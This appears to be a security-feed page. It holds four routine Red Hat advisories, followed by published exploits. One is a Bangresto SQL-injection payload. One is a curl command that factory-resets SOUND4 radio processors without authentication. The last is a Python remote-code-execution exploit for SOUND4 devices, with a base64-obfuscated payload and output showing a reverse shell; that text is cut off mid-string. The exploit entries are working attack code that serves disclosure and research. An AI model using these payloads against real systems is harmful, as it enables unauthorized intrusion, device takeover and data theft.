Red Hat Security Advisory 2022-9077-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.6.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:9077-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9077  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-45414 CVE-2022-46872 CVE-2022-46874  
                   CVE-2022-46878 CVE-2022-46880 CVE-2022-46881  
                   CVE-2022-46882  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.6.0.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Quoting from an HTML email with certain tags will trigger  
network requests and load remote content, regardless of a configuration to  
block remote content (CVE-2022-45414)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2149868 - CVE-2022-45414 Mozilla: Quoting from an HTML email with certain tags will trigger network requests and load remote content, regardless of a configuration to block remote content  
2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
thunderbird-102.6.0-2.el8_1.src.rpm

ppc64le:  
thunderbird-102.6.0-2.el8_1.ppc64le.rpm  
thunderbird-debuginfo-102.6.0-2.el8_1.ppc64le.rpm  
thunderbird-debugsource-102.6.0-2.el8_1.ppc64le.rpm

x86_64:  
thunderbird-102.6.0-2.el8_1.x86_64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_1.x86_64.rpm  
thunderbird-debugsource-102.6.0-2.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45414  
https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5uhJNzjgjWX9erEAQiI6g//QAHaUzB5WdVmUnglLO6NAz1B7iHY9AFu  
lGJQij+kpcZWhhlJNO8ETcHckgpaFZ4Ybzew+lgKFClBFTg89g2ikwAoWykFVSU0  
qAJLnTsnsXbjXidkZUwsoQjFkWrZKw2AFtNI0oL6Yosf9UGaHHZj/JAlzX6YyEXk  
oXaWxK42fE5uYMSDmyfZOswfdfkKK+E20RNz1wmtg07Q23WGOZe6gY52zvQ+2wBA  
QLJWnMFZDzGG5OTTnHhKy/KKdoGE2ARKLZ91uNuWZFWO45CBhHurtDOUGQ4ig2kZ  
HblnRhiqWMC1A1j4faoKbjMc/Fkz40cDj/1xeSuRuKyFDfYPHjAoAH9p1OUcEkwX  
dmMS0ADGE8cTM7YlCRJ7mdtsLRa5AuJU2gjpGaT+NX1X12nT2AJEdk0mgvHVYuaA  
gZTuoHMfRU3lkmfx9Jl1lCmdlPlRAb2+t5KUGXvseOH8hdS/ykFpyymE1uFTMxSC  
GVEeDmxJ4Kh5MjrGmooMX5O8lo0Slo+RCRM1UJ2/f16GkD4FQ5WeIr8L1n9W6TZa  
Fe1ZKYgOC5fLW2l3e7KgyQkyWgCVrZG1kXR6qOMpOsL7cJMVGf0sxRfUD80kvw1f  
Q3RXhpyMulm7yj0dIKPhaTGoVsn9l4fTMfbewLgXEivDcQazx6GuajvRoZBpmcss  
qSWftN0eQtE=bnHu  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9077-01

Red Hat Security Advisory 2022-9067-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.6.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:9067-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9067  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-46872 CVE-2022-46874 CVE-2022-46878  
                   CVE-2022-46880 CVE-2022-46881 CVE-2022-46882  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.6.0 ESR.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
firefox-102.6.0-1.el8_7.src.rpm

aarch64:  
firefox-102.6.0-1.el8_7.aarch64.rpm  
firefox-debuginfo-102.6.0-1.el8_7.aarch64.rpm  
firefox-debugsource-102.6.0-1.el8_7.aarch64.rpm

ppc64le:  
firefox-102.6.0-1.el8_7.ppc64le.rpm  
firefox-debuginfo-102.6.0-1.el8_7.ppc64le.rpm  
firefox-debugsource-102.6.0-1.el8_7.ppc64le.rpm

s390x:  
firefox-102.6.0-1.el8_7.s390x.rpm  
firefox-debuginfo-102.6.0-1.el8_7.s390x.rpm  
firefox-debugsource-102.6.0-1.el8_7.s390x.rpm

x86_64:  
firefox-102.6.0-1.el8_7.x86_64.rpm  
firefox-debuginfo-102.6.0-1.el8_7.x86_64.rpm  
firefox-debugsource-102.6.0-1.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5uhINzjgjWX9erEAQhsCBAAofrVoNgJJ6cPmdajVnfBs1/mUEAli9jI  
V683ma7DQazn20wBOzqLq4aTGNYxVfQFalgfL3jOSYg8qlPcugDh5jAJet/h3RWI  
1pJlC83Ud+QZDU+rbH9oMx7RW1rDbgeuvtR03EMrrL4s9sxgWmTy4+9eFJYofDnL  
culbyd2PzOc9whMbH5Z4y2W4AszBNU9yrUQzIRu1VSXq7uhdA7dyyahtxsCjiTQl  
s0VQADsJuxxCgYk0Xcb8B376kMgg8qZWgDsg/Iv4TXgv0Y9e853HIvswNivXXLCd  
BxU34vEDSTLIoSee3vCCeNKg0SSp1R3zL9bnLK1Hy03WSDnOvO0r2QSksOCs+5WD  
CZ1Y32auq05U3yY+1pg01JNLbOTwxtfejqxQNI/liaQy8p3Sp+tdNpLO40sirawT  
/kwOMhZjEgZwMiy80qkhMFZvBmsvosN7rJQxlLRkUS1wLwhYerX3F8EvgrqNOpAy  
mInilC8KX3iJZm79GtrG9fciUUCJWCGwQg0D3+JZgzHrTz7WUiwSxVnRr5lLGE8X  
h4QotqyCLdanR/Tt7RNQpro9FGTNodlHp20kk2uCHB0GcQ3zL1Z1DZ8TfEYf2rRm  
mQ8Ldp7OlaL53+IiU0unytZSAV9ypVfyy1CDN09CL68+jSftO/PRvWN9b7X0ld5W  
LHBMnzo9r0kJF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9067-01

Red Hat Security Advisory 2022-9058-01 - Prometheus JMX Exporter is a JMX to Prometheus exporter: a collector that can be configured to scrape and expose MBeans of a JMX target. Issues addressed include code execution and deserialization vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: prometheus-jmx-exporter security update  
Advisory ID:       RHSA-2022:9058-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9058  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-1471  
====================================================================  
1. Summary:

An update for prometheus-jmx-exporter is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - noarch

3. Description:

Prometheus JMX Exporter is a JMX to Prometheus exporter: a collector that  
can be configured to scrape and expose MBeans of a JMX target.

Security Fix(es):

* SnakeYaml: Constructor Deserialization Remote Code Execution  
(CVE-2022-1471)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2150009 - CVE-2022-1471 SnakeYaml: Constructor Deserialization Remote Code Execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
prometheus-jmx-exporter-0.12.0-9.el8_7.src.rpm

noarch:  
prometheus-jmx-exporter-0.12.0-9.el8_7.noarch.rpm  
prometheus-jmx-exporter-openjdk11-0.12.0-9.el8_7.noarch.rpm  
prometheus-jmx-exporter-openjdk17-0.12.0-9.el8_7.noarch.rpm  
prometheus-jmx-exporter-openjdk8-0.12.0-9.el8_7.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1471  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/cve/CVE-2022-1471

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5tMj9zjgjWX9erEAQjTGw//bKVd2x49d3FgJD/JDguo1l2702uy6jR5  
+cgE1y3cjQ+v6SKfEjapda+EKQWt5xR0rrZDiBG+1PobLGx/ntx96dF7EUARv0Ld  
KJTn/snPG5qgkIGzQzzVtsBZp5kjCVlJeLqvnMGQrXppP8NiK8287cyJIjC0bZAl  
AD1sqvCefS3U5uR+hELYjQfjw7+8EWKaaqFuDCvnQfc3Z/iM2SzAGSwf/xh80i9a  
4nGiDmwsO0rsLILA3flVBpVSfFvrDYTXpP5fXGrkf5heRJkH/ztvi4MuiOdHsfE+  
BY//smJzdP23T7h6qacmtw8/vyqRcdOV4UfpftwhXrkka3gUG3JOwbPd3WRL1NuB  
tVtA1rYOYJZ1lghJ4sRuzcWzQ5L5IUakNBRZBdh2V1HElXU9ZbWGTz2f36FFEmzc  
tUCx/uPEvhAX/b6qOU1avoI/fUxQVAA4TVrTMKvyhBcvDMs8MBs9D7KxC3lcCCiv  
WIWyMRu6XhNXv6kscFqWuTqqmQ5gvHgBeS+FifjE91Ysokf7ff8ye4iXdptjAy2C  
tQ/STSjSZLru2zP64+6xIg8nZDIqVf1JouQvTVeomQyubmwjbOXq2msUEZWNxPnf  
tehQ5LRMX1YkDJaiUrDNvCMf5Jma3BeqtCt80RRiqAXLuP67e/3MBAgM5lqZjVe5  
k3tBGWDyq8U=T1+4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9058-01

Red Hat Security Advisory 2022-9032-01 - This release of Red Hat build of Eclipse Vert.x 4.3.4 GA includes security updates. For more information, see the release notes listed in the References section. Issues addressed include code execution and deserialization vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat build of Eclipse Vert.x 4.3.4 security update  
Advisory ID:       RHSA-2022:9032-01  
Product:           Red Hat OpenShift Application Runtimes  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9032  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-1471 CVE-2022-42003 CVE-2022-42004  
====================================================================  
1. Summary:

An update is now available for Red Hat build of Eclipse Vert.x.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each  
vulnerability. For more information, see the CVE pages listed in the  
References section.

2. Description:

This release of Red Hat build of Eclipse Vert.x 4.3.4 GA includes security  
updates. For more information, see the release notes listed in the  
References section.

Security Fix(es):

* snakeyaml: Constructor Deserialization Remote Code Execution  
(CVE-2022-1471)

* jackson-databind: deep wrapper array nesting wrt  
UNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003)

* jackson-databind: use of deeply nested arrays (CVE-2022-42004)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgements, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying the update, back up your existing installation, including  
all applications, configuration files, databases and database settings, and  
so on.

The References section of this erratum contains a download link for the  
update. You must be logged in to download the update.

4. Bugs fixed (https://bugzilla.redhat.com/):

2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS  
2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays  
2150009 - CVE-2022-1471 SnakeYaml: Constructor Deserialization Remote Code Execution

5. References:

https://access.redhat.com/security/cve/CVE-2022-1471  
https://access.redhat.com/security/cve/CVE-2022-42003  
https://access.redhat.com/security/cve/CVE-2022-42004  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&productÊtRhoar.eclipse.vertx&version=4.3.4  
https://access.redhat.com/documentation/en-us/red_hat_build_of_eclipse_vert.x/4.3/html/release_notes_for_eclipse_vert.x_4.3/index

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5tMjNzjgjWX9erEAQg27BAAhyVZNJ5iJ/jfYLI1MZBtZ73nJvm5hHew  
LpXPkPRGz/37ahr8rNwIqeWx/IbleB7easbUfYgRYG7RA79BZhTDU40S/c81X7Fc  
OtVGA8hB9W0rRDt0VIV8HKwYxz+nPK3w2HWXMaQPsZA0PriqntxeL8sXOe3I51af  
aAvFS74bWX50QyBY2bMb5L5apVPUOd7WBaEd0nfkA6XQcEcEFZJpkAJdq4isfYeV  
FVEr1aM4yzFWpxo7P2sOlhsL1Fcl+kQx8iLNkf3CKU7iCbvxb4mrW7nvhm2o2lTG  
JxqswFhXRDJLOvEIE0SskoSf7KEoKuoykN24zCzMO9sbirQm4cloRsZh6IFgbD8J  
bB3imFaTIB4swVVIVzJ8ANCCSEshR+oOqgMe2uyi6rjQbLtc2GurW3KmOCQ2IfKz  
DFaDsw0A/AcQJ4eUAk47eX3wlYbDN+G2s4zut8VgbFdlJetj9btfnG15zKJtOTXC  
b9eXsIJTbGaItUBtm4GitO6YgY41RJuntKmtcLBJ3yYDJc8pAykmLEqRlm0Y0/S7  
l/gmbx9FMoLtkFZTqxg6v3FmBxQhGxKy225yW8TZDC9Kz4guMuZF9woMEM44QRn9  
rRResiBH2MpHD8bcmysZVoo3e0e4QpZbdhXOsPD4lf45djJpTYjrp9kE53YDkyLx  
0RfunWsdRPQ=5ZIs  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9032-01

Bangresta version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Bangresto 1.0 SQLi## Author: nu11secur1ty## Date: 12.16.2022## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html## Demo: https://axcora.my.id/bangrestoapp/start.php## Software: https://github.com/mesinkasir/bangresto## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto## Description:The `itemID` parameter appears to be vulnerable to SQL injection attacks.The payload ' was submitted in the itemID parameter, and a databaseerror message was returned.The attacker can be stooling all information from the database of thisapplication.## STATUS: CRITICAL Vulnerability[+] Payload:```MySQL---Parameter: itemID (GET)    Type: error-based    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)    Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT(ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto)## Proof and Exploit:[href](https://streamable.com/moapnd)## Time spent`00:30:00`

Bangresta 1.0 SQL Injection

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from an unauthenticated factory reset vulnerability in restorefactory.cgi.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (restorefactory.cgi) Unauthenticated Factory ResetVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The device allows unauthenticated attackers to visit the unprotected/usr/cgi-bin/restorefactory.cgi endpoint and reset the device to its factorydefault configuration. Once a POST request is made, the device will rebootwith its default settings allowing the attacker to bypass authenticationand take full control of the system.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5742Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5742.php26.09.2022--> curl -kX POST "https://RADIO/cgi-bin/restorefactory.cgi" --data "0x539" \> sleep 120#login admin:admin

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Unauthenticated Factory Reset

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from an unauthenticated remote code execution vulnerability in upload.cgi.

    #!/usr/bin/env python### SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (upload.cgi) Unauthenticated Remote Code Execution### Vendor: SOUND4 Ltd.# Product web page: https://www.sound4.com | https://www.sound4.biz# Affected version: FM/HD Radio Processing:#                   Impact/Pulse/First (Version 2: 1.1/2.15)#                   Impact/Pulse/First (Version 1: 2.1/1.69)#                   Impact/Pulse Eco 1.16#                   Voice Processing:#                   BigVoice4 1.2#                   BigVoice2 1.30#                   Web-Audio Streaming:#                   Stream 1.1/2.4.29#                   Watermarking:#                   WM2 (Kantar Media) 1.11## Summary: The SOUND4 IMPACT introduces an innovative process - mono and# stereo parts of the signal are processed separately to obtain perfect# consistency in terms of both sound and level. Therefore, in moving# reception, when the FM receiver switches from stereo to mono and back to# stereo, the sound variations and changes in level are reduced by over 90%.# In the SOUND4 IMPACT processing chain, the stereo expander can be used# substantially without any limitations.## With its advanced functionalities and impressive versatility, SOUND4# PULSE gives clients the ultimate price - performance ratio, providing# much more than just a processor. Flexible and powerful, it ensures perfect# sound quality and full compatibility with radio broadcasting standards# and can be used simultaneously for FM and HD, DAB, DRM or streaming.## SOUND4 FIRST provides all the most important functionalities you need# in an FM/HD processor and sets the bar high both in terms of performance# and affordability. Designed to deliver a sound of uncompromising quality,# this tool gives you 2-band processing, a digital stereo generator and an# IMPACT Clipper.## Desc: SOUND4 products suffer from an unauthenticated remote code execution# vulnerability. An attacker can exploit this vulnerability by abusing the# firmware upgrade/upload functionality, which contains a path traversal flaw.# This allows the attacker to arbitrarily write a malicious file to a location# on the system with www-data permissions, which can be executed to gain unauthorized# access.# ---------------------------------------------------------------------------# Starting handler on port 6161.# Writing callback file...# Connection from 192.168.1.137:58670# You got shell.# id# uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)# exit# *** Connection closed by remote host ***# ---------------------------------------------------------------------------## Tested on: Apache/2.4.25 (Unix)#            OpenSSL/1.0.2k#            PHP/7.1.1#            GNU/Linux 5.10.43 (armv7l)#            GNU/Linux 4.9.228 (armv7l)### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2022-5741# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5741.php### 26.09.2022##import ipaddress as irukandji#--        -----------------------------from time import sleep#----------        ----------------------------import threading#-----------------        ---------------------------import telnetlib#------------------        --------------------------import requests#--------------------        -------------------------import socket#-----------------------        ------------------------import base64#------------------------        -----------------------import time#---------------------------        ----------------------import sys#-----------------------------        ---------------------import re#-------------------------------        --------------------importer  = "Y2xhc3MgVmlkZW9LaWxsZWRUaGV"+        "SYWRpb1N0YXI6DQog"importer += "ICAgDQogICAgZGVmIF9faW5pdF9f"+        "KHNlbGYpOg0KICAg"importer += "ICAgICBzZWxmLnNlY3JldGFnZW50I"+        "D0gIkRqL09sZSIN"importer += "CiAgICAgICAgc2VsZi5wYXlsb2FkID"+        "0gTm9uZQ0KICAg"importer += "ICAgICBzZWxmLmRlcGxveSA9IE5vbmU"+        "NCiAgICAgICAg"importer += "c2VsZi5yaG9zdCA9IE5vbmUNCiAgICA"+        "gICAgc2VsZi5s"importer += "aG9zdCA9IE5vbmUNCiAgICAgICAgc2"+        "VsZi5scG9ydCA9"importer += "IE5vbmUNCg0KICAgIGRlZiB0aGVfY"+        "XJncyhzZWxmKToN"importer += "CiAgICAgICAgaWYgbGVuKHN5cy5h"+        "cmd2KSAhPSA0Og0K"importer += "ICAgICAgICAgICAgc2VsZi50aGV"+        "fdXNhZ2UoKQ0KICAg"importer += "ICAgICBlbHNlOg0KICAgICAgIC"+        "AgICAgc2VsZi5yaG9z"importer += "dCA9IHN5cy5hcmd2WzFdDQogI"+        "CAgICAgICAgICBzZWxm"importer += "Lmxob3N0ID0gc3lzLmFyZ3Zb"+        "Ml0NCiAgICAgICAgICAg"importer += "IHNlbGYubHBvcnQgPSBpbnQ"+        "oc3lzLmFyZ3ZbM10pDQog"importer += "ICAgICAgICAgICBpZiBub3"+        "QgImh0dHAiIGluIHNlbGYu"importer += "cmhvc3Q6DQogICAgICAgI"+        "CAgICAgICAgc2VsZi5yaG9z"importer += "dCA9ICJodHRwOi8ve30i"+        "LmZvcm1hdChzZWxmLnJob3N0"importer += "KQ0KDQogICAgZGVmIHR"+        "oZV91c2FnZShzZWxmKToNCiAg"importer += "ICAgICAgc2VsZi50aG"+        "Vfd2hhKCkNCiAgICAgICAgcHJp"importer += "bnQoIlVzYWdlOiBwe"+        "XRob24ge30gW3RhcmdldElQOnRh"importer += "cmdldFBPUlRdIFts"+        "aXN0ZW5JUF0gW2xpc3RlblBPUlRd"importer += "Ii5mb3JtYXQoc3l"+        "zLmFyZ3ZbMF0pKQ0KICAgICAgICBl"importer += "eGl0KDApDQoNCi"+        "AgICBkZWYgdGhlX3doYShzZWxmKToN"importer += "CiAgICAgICAgd"+        "Gl0bCA9ICIiIg0KICAgICAgICAgL1xf"importer += "X19fX18gIF9f"+        "DQogICAgICAgIC8tfiAgICAgLF5+IC8g"importer += "X19uDQogICA"+        "gICAgLyAsLS0teCAvXy4tIkwvX18sXFwN"importer += "CiAgICAgIC"+        "8tIi4tLS0uXF8uLScvISIgIFwgXFwNCiAg"importer += "ICAgIDBcL"+        "zBfX18vICAgeCcgLyAgICApIHwNCiAgICAg"importer += "IFwuX19f"+        "X19fLi0nXy57X18uLSJfLl4NCiAgICAgICBg"importer += "eF9fX18"+        "sLi0iLC1+KCAuLSINCiAgICAgICAgICBfLi18"importer += "ICxeLi"+        "1+ICJcXA0KICAgICBfXy4tfl8sLXwvXC8gICAg"importer += "IGBpD"+        "QogICAgLyB1Li1+IC4te1wvICAgICAuLV4tLS4N"importer += "CiAg"+        "ICBcLyAgIHZ+ICwtXnguX19fX30tLXIgfA0KICAg"importer += "ICAg"+        "ICAvIC8iICAgICAgICAgICAgfCB8DQogICAgICBf"importer += "L18vI"+        "CAgICAgICAgICAgICAhX2xfDQogICAgb35fLy8p"importer += "ICAgIC"+        "AgICAgICAgIChfXFxffm8NCn5+fn5+fn5+fn5+"importer += "fn5+fn5"+        "+fn5+fn5+fn5+fn5+fn5+fn4NCiAgICAgICAg"importer += "IiIiDQog"+        "ICAgICAgIHByaW50KHRpdGwpDQoNCiAgICBk"importer += "ZWYgdGhl"+        "X3VwbG9hZChzZWxmKToNCiAgICAgICAgcHJp"importer += "bnQoIldy"+        "aXRpbmcgY2FsbGJhY2sgZmlsZS4uLiIpDQog"importer += "ICAgICAg"+        "IHNlbGYuaGVhZGVycyA9IHsiQ29udGVudC1U"importer += "eXBlIiA6"+         "ICJtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3V"importer += "uZGFyeT0"+          